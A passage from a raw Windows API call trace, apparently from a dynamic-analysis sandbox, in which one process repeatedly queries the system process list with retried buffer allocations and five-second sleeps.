NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1e0000, RegionSize=0xdea88, FreeType=0x8000) returned 0x0 [0220.029] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea50*=0x0, ZeroBits=0x0, RegionSize=0xdea54*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea50*=0x1e0000, RegionSize=0xdea54*=0x20000) returned 0x0 [0220.030] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1e0000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x1e0000, ResultLength=0x0) returned 0x0 [0220.033] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1e0000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0220.034] NtDelayExecution (Alertable=0, Interval=0xdea74*=-50000000) returned 0x0 [0220.036] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea64*=0x0, ZeroBits=0x0, RegionSize=0xdea68*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea64*=0x1e0000, RegionSize=0xdea68*=0x10000) returned 0x0 [0220.037] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1e0000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x1e0000, ResultLength=0x0) returned 0xc0000004 [0220.037] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1e0000, RegionSize=0xdea88, FreeType=0x8000) returned 0x0 [0220.037] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea50*=0x0, ZeroBits=0x0, RegionSize=0xdea54*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea50*=0x1e0000, RegionSize=0xdea54*=0x20000) returned 0x0 [0220.038] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1e0000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x1e0000, ResultLength=0x0) returned 0x0 [0220.042] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1e0000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0220.043] NtDelayExecution (Alertable=0, Interval=0xdea74*=-50000000) returned 0x0 [0220.044] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea64*=0x0, ZeroBits=0x0, RegionSize=0xdea68*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea64*=0x1e0000, RegionSize=0xdea68*=0x10000) returned 0x0 [0220.044] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1e0000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x1e0000, ResultLength=0x0) returned 0xc0000004 [0220.045] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1e0000, RegionSize=0xdea88, FreeType=0x8000) returned 0x0 [0220.045] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea50*=0x0, ZeroBits=0x0, RegionSize=0xdea54*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea50*=0x1e0000, RegionSize=0xdea54*=0x20000) returned 0x0 [0220.045] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1e0000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x1e0000, ResultLength=0x0) returned 0x0 [0220.049] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1e0000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0220.049] NtDelayExecution (Alertable=0, Interval=0xdea74*=-50000000) returned 0x0 [0220.051] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea64*=0x0, ZeroBits=0x0, RegionSize=0xdea68*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea64*=0x1e0000, RegionSize=0xdea68*=0x10000) returned 0x0 [0220.051] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1e0000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x1e0000, ResultLength=0x0) returned 0xc0000004 [0220.051] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1e0000, RegionSize=0xdea88, FreeType=0x8000) returned 0x0 [0220.052] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea50*=0x0, ZeroBits=0x0, RegionSize=0xdea54*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea50*=0x1e0000, RegionSize=0xdea54*=0x20000) returned 0x0 [0220.052] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1e0000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x1e0000, ResultLength=0x0) returned 0x0 [0220.056] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1e0000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0220.056] NtDelayExecution (Alertable=0, Interval=0xdea74*=-50000000) returned 0x0 [0220.058] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea64*=0x0, ZeroBits=0x0, RegionSize=0xdea68*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea64*=0x1e0000, RegionSize=0xdea68*=0x10000) returned 0x0 [0220.058] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1e0000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x1e0000, ResultLength=0x0) returned 0xc0000004 [0220.059] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1e0000, RegionSize=0xdea88, FreeType=0x8000) returned 0x0 [0220.059] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea50*=0x0, ZeroBits=0x0, RegionSize=0xdea54*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea50*=0x1e0000, RegionSize=0xdea54*=0x20000) returned 0x0 [0220.059] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1e0000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x1e0000, ResultLength=0x0) returned 0x0 [0220.062] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1e0000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0220.063] NtDelayExecution (Alertable=0, Interval=0xdea74*=-50000000) returned 0x0 [0220.064] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea64*=0x0, ZeroBits=0x0, RegionSize=0xdea68*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea64*=0x1e0000, RegionSize=0xdea68*=0x10000) returned 0x0 [0220.064] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1e0000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x1e0000, ResultLength=0x0) returned 0xc0000004 [0220.065] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1e0000, RegionSize=0xdea88, FreeType=0x8000) returned 0x0 [0220.065] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea50*=0x0, ZeroBits=0x0, RegionSize=0xdea54*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea50*=0x1e0000, RegionSize=0xdea54*=0x20000) returned 0x0 [0220.065] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1e0000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x1e0000, ResultLength=0x0) returned 0x0 [0220.070] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1e0000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0220.071] NtDelayExecution (Alertable=0, Interval=0xdea74*=-50000000) returned 0x0 [0220.072] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea64*=0x0, ZeroBits=0x0, RegionSize=0xdea68*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea64*=0x1e0000, RegionSize=0xdea68*=0x10000) returned 0x0 [0220.072] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1e0000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x1e0000, ResultLength=0x0) returned 0xc0000004 [0220.073] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1e0000, RegionSize=0xdea88, FreeType=0x8000) returned 0x0 [0220.073] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea50*=0x0, ZeroBits=0x0, RegionSize=0xdea54*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea50*=0x1e0000, RegionSize=0xdea54*=0x20000) returned 0x0 [0220.074] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1e0000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x1e0000, ResultLength=0x0) returned 0x0 [0220.077] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1e0000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0220.077] NtDelayExecution (Alertable=0, Interval=0xdea74*=-50000000) returned 0x0 [0220.079] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea64*=0x0, ZeroBits=0x0, RegionSize=0xdea68*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea64*=0x1e0000, RegionSize=0xdea68*=0x10000) returned 0x0 [0220.079] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1e0000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x1e0000, ResultLength=0x0) returned 0xc0000004 [0220.079] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1e0000, RegionSize=0xdea88, FreeType=0x8000) returned 0x0 [0220.080] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea50*=0x0, ZeroBits=0x0, RegionSize=0xdea54*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea50*=0x1e0000, RegionSize=0xdea54*=0x20000) returned 0x0 [0220.080] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1e0000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x1e0000, ResultLength=0x0) returned 0x0 [0220.083] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1e0000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0220.084] NtDelayExecution (Alertable=0, Interval=0xdea74*=-50000000) returned 0x0 [0220.085] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea64*=0x0, ZeroBits=0x0, RegionSize=0xdea68*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea64*=0x1e0000, RegionSize=0xdea68*=0x10000) returned 0x0 [0220.085] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1e0000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x1e0000, ResultLength=0x0) returned 0xc0000004 [0220.086] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1e0000, RegionSize=0xdea88, FreeType=0x8000) returned 0x0 [0220.086] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea50*=0x0, ZeroBits=0x0, RegionSize=0xdea54*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea50*=0x1e0000, RegionSize=0xdea54*=0x20000) returned 0x0 [0220.086] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1e0000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x1e0000, ResultLength=0x0) returned 0x0 [0220.091] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1e0000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0220.091] NtDelayExecution (Alertable=0, Interval=0xdea74*=-50000000) returned 0x0 [0220.093] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea64*=0x0, ZeroBits=0x0, RegionSize=0xdea68*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea64*=0x1e0000, RegionSize=0xdea68*=0x10000) returned 0x0 [0220.093] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1e0000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x1e0000, ResultLength=0x0) returned 0xc0000004 [0220.094] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1e0000, RegionSize=0xdea88, FreeType=0x8000) returned 0x0 [0220.094] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea50*=0x0, ZeroBits=0x0, RegionSize=0xdea54*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea50*=0x1e0000, RegionSize=0xdea54*=0x20000) returned 0x0 [0220.095] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1e0000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x1e0000, ResultLength=0x0) returned 0x0 [0220.099] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1e0000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0220.099] NtDelayExecution (Alertable=0, Interval=0xdea74*=-50000000) returned 0x0 [0220.101] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea64*=0x0, ZeroBits=0x0, RegionSize=0xdea68*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea64*=0x1e0000, RegionSize=0xdea68*=0x10000) returned 0x0 [0220.101] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1e0000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x1e0000, ResultLength=0x0) returned 0xc0000004 [0220.102] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1e0000, RegionSize=0xdea88, FreeType=0x8000) returned 0x0 [0220.102] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea50*=0x0, ZeroBits=0x0, RegionSize=0xdea54*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea50*=0x1e0000, RegionSize=0xdea54*=0x20000) returned 0x0 [0220.103] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1e0000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x1e0000, ResultLength=0x0) returned 0x0 [0220.107] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1e0000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0220.108] NtDelayExecution (Alertable=0, Interval=0xdea74*=-50000000) returned 0x0 [0220.109] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea64*=0x0, ZeroBits=0x0, RegionSize=0xdea68*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea64*=0x1e0000, RegionSize=0xdea68*=0x10000) returned 0x0 [0220.110] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1e0000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x1e0000, ResultLength=0x0) returned 0xc0000004 [0220.110] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1e0000, RegionSize=0xdea88, FreeType=0x8000) returned 0x0 [0220.111] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea50*=0x0, ZeroBits=0x0, RegionSize=0xdea54*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea50*=0x1e0000, RegionSize=0xdea54*=0x20000) returned 0x0 [0220.111] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1e0000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x1e0000, ResultLength=0x0) returned 0x0 [0220.114] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1e0000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0220.115] NtDelayExecution (Alertable=0, Interval=0xdea74*=-50000000) returned 0x0 [0220.117] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea64*=0x0, ZeroBits=0x0, RegionSize=0xdea68*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea64*=0x1e0000, RegionSize=0xdea68*=0x10000) returned 0x0 [0220.117] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1e0000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x1e0000, ResultLength=0x0) returned 0xc0000004 [0220.118] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1e0000, RegionSize=0xdea88, FreeType=0x8000) returned 0x0 [0220.118] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea50*=0x0, ZeroBits=0x0, RegionSize=0xdea54*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea50*=0x1e0000, RegionSize=0xdea54*=0x20000) returned 0x0 [0220.118] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1e0000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x1e0000, ResultLength=0x0) returned 0x0 [0220.122] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1e0000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0220.122] NtDelayExecution (Alertable=0, Interval=0xdea74*=-50000000) returned 0x0 [0220.124] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea64*=0x0, ZeroBits=0x0, RegionSize=0xdea68*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea64*=0x1e0000, RegionSize=0xdea68*=0x10000) returned 0x0 [0220.124] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1e0000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x1e0000, ResultLength=0x0) returned 0xc0000004 [0220.125] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1e0000, RegionSize=0xdea88, FreeType=0x8000) returned 0x0 [0220.125] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea50*=0x0, ZeroBits=0x0, RegionSize=0xdea54*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea50*=0x1e0000, RegionSize=0xdea54*=0x20000) returned 0x0 [0220.125] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1e0000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x1e0000, ResultLength=0x0) returned 0x0 [0220.130] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1e0000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0220.131] NtDelayExecution (Alertable=0, Interval=0xdea74*=-50000000) returned 0x0 [0220.132] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea64*=0x0, ZeroBits=0x0, RegionSize=0xdea68*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea64*=0x1e0000, RegionSize=0xdea68*=0x10000) returned 0x0 [0220.133] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1e0000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x1e0000, ResultLength=0x0) returned 0xc0000004 [0220.133] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1e0000, RegionSize=0xdea88, FreeType=0x8000) returned 0x0 [0220.134] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea50*=0x0, ZeroBits=0x0, RegionSize=0xdea54*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea50*=0x1e0000, RegionSize=0xdea54*=0x20000) returned 0x0 [0220.134] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1e0000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x1e0000, ResultLength=0x0) returned 0x0 [0220.137] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1e0000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0220.138] NtDelayExecution (Alertable=0, Interval=0xdea74*=-50000000) returned 0x0 [0220.140] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea64*=0x0, ZeroBits=0x0, RegionSize=0xdea68*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea64*=0x1e0000, RegionSize=0xdea68*=0x10000) returned 0x0 [0220.140] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1e0000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x1e0000, ResultLength=0x0) returned 0xc0000004 [0220.141] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1e0000, RegionSize=0xdea88, FreeType=0x8000) returned 0x0 [0220.141] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea50*=0x0, ZeroBits=0x0, RegionSize=0xdea54*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea50*=0x1e0000, RegionSize=0xdea54*=0x20000) returned 0x0 [0220.141] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1e0000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x1e0000, ResultLength=0x0) returned 0x0 [0220.146] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1e0000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0220.146] NtDelayExecution (Alertable=0, Interval=0xdea74*=-50000000) returned 0x0 [0220.148] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea64*=0x0, ZeroBits=0x0, RegionSize=0xdea68*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea64*=0x1e0000, RegionSize=0xdea68*=0x10000) returned 0x0 [0220.148] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1e0000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x1e0000, ResultLength=0x0) returned 0xc0000004 [0220.149] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1e0000, RegionSize=0xdea88, FreeType=0x8000) returned 0x0 [0220.149] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea50*=0x0, ZeroBits=0x0, RegionSize=0xdea54*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea50*=0x1e0000, RegionSize=0xdea54*=0x20000) returned 0x0 [0220.149] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1e0000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x1e0000, ResultLength=0x0) returned 0x0 [0220.154] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1e0000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0220.155] NtDelayExecution (Alertable=0, Interval=0xdea74*=-50000000) returned 0x0 [0220.156] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea64*=0x0, ZeroBits=0x0, RegionSize=0xdea68*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea64*=0x1e0000, RegionSize=0xdea68*=0x10000) returned 0x0 [0220.157] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1e0000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x1e0000, ResultLength=0x0) returned 0xc0000004 [0220.157] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1e0000, RegionSize=0xdea88, FreeType=0x8000) returned 0x0 [0220.158] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea50*=0x0, ZeroBits=0x0, RegionSize=0xdea54*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea50*=0x1e0000, RegionSize=0xdea54*=0x20000) returned 0x0 [0220.158] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1e0000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x1e0000, ResultLength=0x0) returned 0x0 [0220.164] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1e0000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0220.165] NtDelayExecution (Alertable=0, Interval=0xdea74*=-50000000) returned 0x0 [0220.166] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea64*=0x0, ZeroBits=0x0, RegionSize=0xdea68*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea64*=0x1e0000, RegionSize=0xdea68*=0x10000) returned 0x0 [0220.167] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1e0000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x1e0000, ResultLength=0x0) returned 0xc0000004 [0220.167] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1e0000, RegionSize=0xdea88, FreeType=0x8000) returned 0x0 [0220.167] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea50*=0x0, ZeroBits=0x0, RegionSize=0xdea54*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea50*=0x1e0000, RegionSize=0xdea54*=0x20000) returned 0x0 [0220.168] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1e0000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x1e0000, ResultLength=0x0) returned 0x0 [0220.171] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1e0000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0220.172] NtDelayExecution (Alertable=0, Interval=0xdea74*=-50000000) returned 0x0 [0220.174] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea64*=0x0, ZeroBits=0x0, RegionSize=0xdea68*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea64*=0x1e0000, RegionSize=0xdea68*=0x10000) returned 0x0 [0220.174] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1e0000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x1e0000, ResultLength=0x0) returned 0xc0000004 [0220.175] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1e0000, RegionSize=0xdea88, FreeType=0x8000) returned 0x0 [0220.176] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea50*=0x0, ZeroBits=0x0, RegionSize=0xdea54*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea50*=0x1e0000, RegionSize=0xdea54*=0x20000) returned 0x0 [0220.176] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1e0000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x1e0000, ResultLength=0x0) returned 0x0 [0220.180] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1e0000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0220.180] NtDelayExecution (Alertable=0, Interval=0xdea74*=-50000000) returned 0x0 [0220.182] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea64*=0x0, ZeroBits=0x0, RegionSize=0xdea68*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea64*=0x1e0000, RegionSize=0xdea68*=0x10000) returned 0x0 [0220.182] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1e0000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x1e0000, ResultLength=0x0) returned 0xc0000004 [0220.183] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1e0000, RegionSize=0xdea88, FreeType=0x8000) returned 0x0 [0220.183] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea50*=0x0, ZeroBits=0x0, RegionSize=0xdea54*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea50*=0x1e0000, RegionSize=0xdea54*=0x20000) returned 0x0 [0220.183] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1e0000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x1e0000, ResultLength=0x0) returned 0x0 [0220.187] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1e0000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0220.188] NtDelayExecution (Alertable=0, Interval=0xdea74*=-50000000) returned 0x0 [0220.189] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea64*=0x0, 